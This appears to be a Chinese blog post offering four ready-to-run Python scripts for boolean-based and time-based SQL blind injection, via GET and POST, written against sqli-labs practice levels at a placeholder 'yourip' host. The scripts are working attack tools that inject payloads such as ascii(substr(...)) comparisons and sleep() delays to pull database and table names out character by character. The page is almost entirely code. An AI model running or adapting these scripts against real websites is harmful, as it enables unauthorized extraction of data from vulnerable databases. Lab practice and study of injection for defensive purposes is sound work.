BOOL型GET传参sql盲注

点击查看代码 
import requests

chars =""

for i in range(32,127):

    chars += chr(i)

result = ""

url_template = "http://yourip/sqllabs/Less-8/?id=2' and ascii(substr(({0}),{1},1))>{2} %23"

url_length = "http://yourip/sqllabs/Less-8/?id=2' and length(({0})) >{1} %23"

def get_result_length(payload,value):

    for n in range(1,100):

        url = url_length.format(payload,n)

        response = requests.get(url)

        length = len(response.text)

        if length >value:

            print("·······data length is :" + str(n))

            return  n

def get_db_name(data_length,payload,value):

    for i in range(1,data_length):

        for char in chars:

            url = url_template.format(payload,i,ord(char))

            response = requests.get(url)

            length = len(response.text)

            if length>value:         #根据返回长度的不同来判断字符正确与否

                global result

                result += char

                print("·······data is :"+ result)

                break

#自定义 sql注入语句 payload   分割符 为0

payload = "select group_concat(table_name) from information_schema.tables where table_schema=database() "

# 根据正确访问时错误访问时返回页面文本长度的不同 来设置一个判断值

value = 706

data_length = get_result_length(payload,value)+1

get_db_name(data_length,payload,value)

print(result)

**延时型GET传参sql盲注**

点击查看代码 
import requests

value =""

for i in range(32,127):

    value += chr(i)

data=""

# 需要 不断 手工调整 url 和 url_length 中的 limit 的第一个参数 来获取下一行的数据

url = "http://yourip/sqllabs/Less-9/?id=1' and if((ascii(substr(({0} limit 1,1),{1},1)) = '{2}'),sleep(3),NULL); %23"

url_length="http://yourip/sqllabs/Less-9/?id=1' and if((length(({0} limit 1,1))={1} ),sleep(3),NULL); %23"

def get_length(payload):

    for n in range(1,100):

        url= url_length.format(payload,n)

        #print(url)

        if(get_respone(url)):

            print("[+] length is {0}".format(n))

            return n

def get_data(payload,value,length):

    for n in range(1,length):

        for v in value :

            url_data = url.format(payload,n,ord(v)) #ord()返回字符的ASCII码

            #print(url_data)

            if(get_respone(url_data)):

                global data

                data=data+v

                print("[+] data is {0}".format(data))

                break

def get_respone(url):

    try:

        html = requests.get(url,timeout=2)

        return False

    except Exception as e:

        print("......")

        return True

#可以更改payload 来获取需要的数据

databse_payload ="select database()"

get_data(databse_payload,value,get_length(databse_payload)+1)

**BOOL型POST传参sql盲注**

点击查看代码 
import requests

chars =""

for i in range(32,127):

    chars += chr(i)

result = ""

def get_length(value):  #获取要查询的数据的长度

    for n in range(1,100):

        payload = "admin' and length(({0})) ={1} #".format(data_payload,n)

        data = {"uname":payload,"passwd":"admin"}

        html = requests.post(url,data=data)

        length = len(html.text)

        if length >value:

            print("……data length is :" + str(n))

            return  n

def get_data(data_length,value): #获取数据

    global result

    for i in range(1,data_length):

        for char in chars:

            payload = "admin'and ascii(substr(({0}),{1},1))={2} #".format(data_payload,i,ord(char))

            data = {"uname":payload,"passwd":"admin"}

            html = requests.post(url,data=data)

            length = len(html.text)

            if length>value:         #根据返回长度的不同来判断字符正确与否

                result += char

                print("…… data is :"+ result)

                break

url = "http://yourip/sqllabs/Less-15/"

data_payload = "select group_concat(table_name)from information_schema.tables where table_schema = database()"

value = 1460     # 根据正确访问和错误访问时返回页面文本长度的不同 来设置一个判断值,这个值需要在浏览器中 按f12 查看

length = get_length(value) +1

get_data(length,value)

print(result)

**延时型POST传参sql盲注**

点击查看代码 


import requests

import time

value =""

for i in range(32,127):

    value += chr(i)

result=""

def get_length():#获取数据的长度

    for n in range(1, 100):

        payload = "admin' and if((length(({0} ))={1}),sleep(2),1) #".format(data_payload, n)

        data = {"uname": payload, "passwd": "admin", "submit": "submit"}

        start_time = time.time()

        html = requests.post(url, data=data)

        end_time = time.time()

        use_time = end_time - start_time #求出请求前后的时间差来判断是否延时了

        if use_time > 2:

            print("...... data's length is :"+ str(n))

            return n

def get_data(length):#获取数据

    global result

    for n in range(1,length):

        for v in value :

            payload = "admin' and if((ascii(substr(({0} ),{1},1)) = '{2}'),sleep(2),1) #".format(data_payload,n,ord(v))

            data = {"uname":payload,"passwd":"admin","submit":"submit"}

            start_time = time.time()

            requests.post(url,data=data)

            end_time = time.time()

            use_time = end_time - start_time

            if use_time >2:

                result += v

                print("......"+result)

url = "http://yourip/sqllabs/Less-11/"

data_payload ="select database()"

length = get_length() + 1   #注意这里要长度加 1 因为 range(1,10)的范围是 1<= x <10

get_data(length)

print(".....data is :"+ result)

几种SQL盲注的脚本的更多相关文章

  1. metinfo小于v6.2.0版本SQL盲注利用脚本

    #coding=utf-8 import requests import re import sys import time #获取config_safe.php中的 key def getKey(u ...

  2. DVWA-SQL Injection (Bind) SQL盲注

    盲注同于union select查询注入,盲注只能得到数据库回显的正确和错误,利用返回的正确和错误一个一个判断. LOW 审计源码 <?php if( isset( $_GET[ 'Submit ...

  3. SQL盲注攻击的简单介绍

    1 简介     1.1 普通SQL注入技术概述     目前没有对SQL注入技术的标准定义,微软中国技术中心从2个方面进行了描述[1]:     (1) 脚本注入式的攻击     (2) 恶意用户输 ...

  4. Web系统常见安全漏洞及解决方案-SQL盲注

    关于web安全测试,目前主要有以下几种攻击方法: 1.XSS 2.SQL注入 3.跨目录访问 4.缓冲区溢出 5.cookies修改 6.Htth方法篡改(包括隐藏字段修改和参数修改) 7.CSRF ...

  5. (转)SQL盲注攻击的简单介绍

    转:http://hi.baidu.com/duwang1104/item/65a6603056aee780c3cf2968 1 简介     1.1 普通SQL注入技术概述     目前没有对SQL ...

  6. Bugku-CTF之login3(SKCTF)(基于布尔的SQL盲注)

    Day41 login3(SKCTF)

  7. WEB安全实战(一)SQL盲注

    前言 好长时间没有写过东西了,不是不想写,仅仅只是是一直静不下心来写点东西.当然,拖了这么长的时间,也总该写点什么的.近期刚刚上手安全方面的东西,作为一个菜鸟,也本着学习的目的,就谈谈近期接触到的安全 ...

  8. WEB安全番外第四篇--关于SQL盲注

    一.SQL盲注: 看不到回显的,无法从返回直接读取到数据库内容的对数据的猜解,属于盲注. 二.第一种--基于布尔类型的盲注: 这种很简单,最典型的例子,就是挖SQL注入的时候常用的: ''' http ...

  9. SQL盲注

    一.首先输入1和-1 查看输入正确和不正确两种情况 二.三种注入POC LOW等级 ... where user_id =$id 输入      真  and  假 = 假 (1)...where u ...

  10. 第九届极客大挑战——Geek Chatroom(sql盲注)

    首先观察这个web应用的功能,可以任意留言,也可以搜索留言,当然我还用cansina扫描过网站,查看过源码,抓包查看过header等.没发现其他提示的情况下断定这就是个sql注入,可能存在的注入点呢, ...

随机推荐

  1. 编译GO报错:cgo: C compiler

    cgo: C compiler "gcc" not found: exec: "gcc": executable file not found in %PATH ...

  2. springboot的websocket因IP问题无法连接

    首先遇到这个问题有点奇葩,出现在项目上线时的客户现场,头两天一直都无法确定原因,因为它的表现方式很奇怪,基于springboot实现的websocket,同样的代码在公司研发环境不会有问题,客户现场会 ...

  3. appium之手机操作的方法

    Appium内置方法,来操作手机.在做app自动化时,可以内置方法的基本上,对一些常用的手机操作进行方法的封装. 常用的方法有: 获取手机分辨率: driver.get_window(size) # ...

  4. Caused by: java.lang.NoSuchMethodError

    ERROR [localhost-startStop-1] - Context initialization failedorg.springframework.beans.factory.BeanD ...

  5. VSCode 快捷键,简化操作

    一. 区域代码快捷键 1. 折叠所有 折叠所有区域代码的快捷: ctrl + k      ctrl + 0 ; 展开所有折叠区域代码的快捷:ctrl +k      ctrl + J ; 2. 按层 ...

  6. gRPC之.Net6中的初步使用说明

    1.介绍 GRPC是一个高性能.通用的开源远程过程调用(RPC)框架,基于底层HTTP/2协议标准和协议层Protobuf序列化协议开发,支持众多的开发语言,由Google开源. gRPC也是基于以下 ...

  7. CentOS Docker安装、镜像加速

    CentOS Docker安装 方法一:使用官方安装脚本自动安装 # 安装命令: curl -fsSL https://get.docker.com | bash -s docker --mirror ...

  8. 暗夜发光,独自闪耀,盘点网页暗黑模式(DarkMode)下的特效和动效,CSS3实现

    众所周知,网页的暗黑模式可以减少屏幕反射和蓝光辐射,减少眼睛的疲劳感,特别是在夜间使用时更为明显.其实暗黑模式也给霓虹灯效应(Neon Effect)提供了发挥的环境. 霓虹灯效应是一种视觉效果,其特 ...

  9. flutter---->阿里云oss的插件

    目前为止,阿里云官方并没有dart版本的oss sdk,所以才开发了这个插件flutter_oss_aliyun提供对oss sdk的支持. flutter_oss_aliyun 一个访问阿里云oss ...

  10. 西瓜视频的li绑定容器 踏坑之旅

    一定要绑定key,不然会出现一个li里面渲染出两个video标签